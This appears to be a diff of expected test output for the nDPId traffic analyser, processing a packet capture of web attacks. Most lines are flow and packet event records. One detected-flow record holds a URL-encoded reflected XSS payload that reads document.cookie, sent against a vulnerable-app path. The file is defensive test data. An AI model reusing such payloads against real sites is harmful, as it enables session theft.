+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347805119,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347805119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347805119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZmVAAD4GX2usEAABwKgKMoBuAFBq0H\/ZAAAAAKACchDYowAAAgQFtAQCCAoBPBm8AAAAAAEDAwc="}
@@ -2835,22 +2835,22 @@
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347811525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/z1AAD4GxpKsEAABwKgKMoCyAFD5M+DDAAAAAKACchDizwAAAgQFtAQCCAoBPB\/+AAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":2,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347811525,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgLJEEu3h+TPgxKAScSC8YgAAAgQFtAQCCAoD5fFyATwf\/gEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":3,"flow_last_seen":1499347811526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347811526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/z5AAD4GxpmsEAABwKgKMoCyAFD5M+DERBLt4oAQAOVbagAAAQEICgE8H\/4D5fFy"}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347812797,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347812797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347812797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YtxAAD4GYvSsEAABwKgKMoDAAFAQTEPgAAAAAKACchBnTwAAAgQFtAQCCAoBPCE8AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":2,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347812797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgMBbJW45EExD4aAScSCoOQAAAgQFtAQCCAoD5fKwATwhPAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":3,"flow_last_seen":1499347812798,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347812798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Yt1AAD4GYvusEAABwKgKMoDAAFAQTEPhWyVuOoAQAOVHQQAAAQEICgE8ITwD5fKw"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347813820,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347814066,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347814066,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347814066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NuNAAD4Gju2sEAABwKgKMoDOAFApMBSaAAAAAKACchB8ZgAAAgQFtAQCCAoBPCJ5AAAAAAEDAwc="}
@@ -2876,15 +2876,15 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347823117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vRAAD4GxtusEAABwKgKMoEsAFBFq9WkAAAAAKACchCVqwAAAgQFtAQCCAoBPCtQAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":2,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347823117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgSyhFRrnRavVpaAScSDZ4wAAAgQFtAQCCAoD5fzEATwrUAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":3,"flow_last_seen":1499347823118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347823118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vVAAD4GxuKsEAABwKgKMoEsAFBFq9WloRUa6IAQAOV46wAAAQEICgE8K1AD5fzE"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
